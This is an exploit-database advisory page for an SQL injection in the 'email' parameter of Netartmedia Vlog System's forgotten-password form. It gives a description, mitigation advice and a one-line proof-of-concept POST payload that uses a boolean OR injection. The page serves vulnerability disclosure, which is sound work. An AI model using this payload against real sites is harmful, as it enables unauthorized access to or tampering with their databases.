header-logo
Suggest Exploit
vendor:
Vlog System
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vlog System
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:vlog_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia Vlog System – ’email’ SQL Injection

Netartmedia Vlog System is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify data in the back-end database, compromise the application, access or escalate privileges, or execute arbitrary commands on the operating system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow malicious SQL code to be executed. Parameterized queries should be used to ensure that user-supplied data is treated as a data value and not as executable code.
Source

Exploit-DB raw data:

# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password

Navigation

Suggest Exploit

Services By CQR